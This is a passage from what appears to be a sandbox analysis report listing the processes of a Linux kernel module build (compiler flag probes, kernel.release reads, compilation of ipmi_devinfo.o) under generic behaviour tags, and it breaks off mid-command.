/bin/mkdirmkdir -p /tmp/a/.tmp_21084⤵PID:2109
-
/usr/bin/arar rcD /tmp/a/.tmp_2108/tmp4⤵PID:2110
-
/bin/rmrm -rf /tmp/a/.tmp_21084⤵PID:2111
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___ar_rcD_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"D\";_else_echo_\"\";_fi := D' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:2112 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wpacked-not-aligned -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-packed-not-aligned\"; else echo \"\"; fi"3⤵PID:2113
-
/bin/mkdirmkdir -p /tmp/a/.tmp_21134⤵PID:2114
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wpacked-not-aligned -c -x c /dev/null -o /tmp/a/.tmp_2113/tmp4⤵PID:2115
-
/bin/rmrm -rf /tmp/a/.tmp_21134⤵PID:2116
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-Wpacked-not-aligned_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-packed-not-aligned\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:2117 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Wl,--build-id -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -nostdlib -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -Wl,--build-id\"; else echo \"\"; fi"3⤵PID:2118
-
/bin/mkdirmkdir -p /tmp/a/.tmp_21184⤵PID:2119
-
/usr/bin/gccgcc "-Wl,--build-id" -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -nostdlib -x c /dev/null -o /tmp/a/.tmp_2118/tmp4⤵PID:2120
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase null -O2 -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -o -5⤵PID:2121
-
/usr/local/sbin/asas --64 -o /tmp/ccEg85ZZ.o5⤵PID:2122
-
/usr/local/bin/asas --64 -o /tmp/ccEg85ZZ.o5⤵PID:2122
-
/usr/sbin/asas --64 -o /tmp/ccEg85ZZ.o5⤵PID:2122
-
/usr/bin/asas --64 -o /tmp/ccEg85ZZ.o5⤵PID:2122
-
/usr/lib/gcc/x86_64-linux-gnu/7/collect2/usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc2kNKPC.res" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /tmp/a/.tmp_2118/tmp -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. --build-id /tmp/ccEg85ZZ.o5⤵
- Writes file to tmp directory
PID:2123 -
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc2kNKPC.res" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /tmp/a/.tmp_2118/tmp -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. --build-id /tmp/ccEg85ZZ.o6⤵PID:2124
-
/bin/rmrm -rf /tmp/a/.tmp_21184⤵PID:2125
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc__-Wl_--build-id_-D__KERNEL_____-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-nostdlib_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-Wl_--build-id\";_else_echo_\"\";_fi := -Wl,--build-id' >> /tmp/a/.cache.mk"3⤵PID:2126
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( ld -m elf_x86_64 -z max-page-size=0x200000 -z noexecstack --no-warn-rwx-segments -v) >/dev/null 2>&1; then echo \"--no-warn-rwx-segments\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2127 -
/bin/mkdirmkdir -p /tmp/a/.tmp_21274⤵
- Reads runtime system information
PID:2128 -
/usr/bin/ldld -m elf_x86_64 -z "max-page-size=0x200000" -z noexecstack --no-warn-rwx-segments -v4⤵PID:2129
-
/bin/rmrm -rf /tmp/a/.tmp_21274⤵PID:2130
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___ld_-m_elf_x86_64_-z_max-page-size_0x200000_-z_noexecstack_--no-warn-rwx-segments_-v__>/dev/null_2>&1;_then_echo_\"--no-warn-rwx-segments\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵PID:2131
-
/bin/sh/bin/sh -c "pkg-config libelf --libs 2>/dev/null || echo -lelf"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2132 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( echo \"int main() {}\" | gcc -xc -o /dev/null -lelf -) >/dev/null 2>&1; then echo \"1\"; else echo \"0\"; fi"3⤵PID:2133
-
/bin/mkdirmkdir -p /tmp/a/.tmp_21334⤵
- Reads runtime system information
PID:2134 -
/usr/bin/gccgcc -xc -o /dev/null -lelf -4⤵PID:2137
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu - -quiet -dumpbase - "-mtune=generic" "-march=x86-64" -auxbase - -fstack-protector-strong -Wformat -Wformat-security -o /tmp/ccnndo0Y.s5⤵
- Writes file to tmp directory
PID:2138 -
/usr/local/sbin/asas --64 -o /tmp/ccGZZkVB.o /tmp/ccnndo0Y.s5⤵PID:2139
-
/usr/local/bin/asas --64 -o /tmp/ccGZZkVB.o /tmp/ccnndo0Y.s5⤵PID:2139
-
/usr/sbin/asas --64 -o /tmp/ccGZZkVB.o /tmp/ccnndo0Y.s5⤵PID:2139
-
/usr/bin/asas --64 -o /tmp/ccGZZkVB.o /tmp/ccnndo0Y.s5⤵PID:2139
-
/usr/lib/gcc/x86_64-linux-gnu/7/collect2/usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc1z0VQe.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /dev/null /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. -lelf /tmp/ccGZZkVB.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o5⤵
- Writes file to tmp directory
PID:2140 -
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc1z0VQe.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /dev/null /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. -lelf /tmp/ccGZZkVB.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o6⤵PID:2141
-
/bin/rmrm -rf /tmp/a/.tmp_21334⤵PID:2142
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2143
-
/bin/catcat include/config/kernel.release4⤵PID:2144
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2145 -
/bin/catcat include/config/kernel.release4⤵PID:2146
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2147 -
/bin/catcat include/config/kernel.release4⤵PID:2148
-
/bin/sh/bin/sh -c "test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \\ echo >&2; \\ echo >&2 \" ERROR: Kernel configuration is invalid.\"; \\ echo >&2 \" include/generated/autoconf.h or include/config/auto.conf are missing.\";\\ echo >&2 \" Run 'make oldconfig && make prepare' on kernel src to fix it.\"; \\ echo >&2 ; \\ /bin/false)"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2149 -
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2150 -
/bin/catcat include/config/kernel.release4⤵PID:2151
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2152 -
/bin/catcat include/config/kernel.release4⤵PID:2153
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2154 -
/bin/catcat include/config/kernel.release4⤵PID:2155
-
/bin/sh/bin/sh -c "mkdir -p /tmp/a/.tmp_versions ; rm -f /tmp/a/.tmp_versions/*"3⤵PID:2156
-
/bin/mkdirmkdir -p /tmp/a/.tmp_versions4⤵PID:2157
-
/bin/rmrm -f "/tmp/a/.tmp_versions/*"4⤵PID:2158
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2159
-
/bin/catcat include/config/kernel.release4⤵PID:2160
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2161
-
/bin/catcat include/config/kernel.release4⤵PID:2162
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2163
-
/bin/catcat include/config/kernel.release4⤵PID:2164
-
/bin/sh/bin/sh -c "test -e ./Module.symvers || ( \\ echo; \\ echo \" WARNING: Symbol version dump ./Module.symvers\"; \\ echo \" is missing; modules will have no dependencies and modversions.\"; \\ echo )"3⤵PID:2165
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2166
-
/bin/catcat include/config/kernel.release4⤵PID:2167
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2168 -
/bin/catcat include/config/kernel.release4⤵PID:2169
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵PID:2170
-
/bin/catcat include/config/kernel.release4⤵PID:2171
-
/usr/local/sbin/makemake -f ./scripts/Makefile.build "obj=/tmp/a"3⤵PID:2172
-
/usr/local/bin/makemake -f ./scripts/Makefile.build "obj=/tmp/a"3⤵PID:2172
-
/usr/sbin/makemake -f ./scripts/Makefile.build "obj=/tmp/a"3⤵PID:2172
-
/usr/bin/makemake -f ./scripts/Makefile.build "obj=/tmp/a"3⤵PID:2172
-
/bin/sh/bin/sh -c "set -e; echo ' CC [M] /tmp/a/ipmi_devinfo.o'; gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/7/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 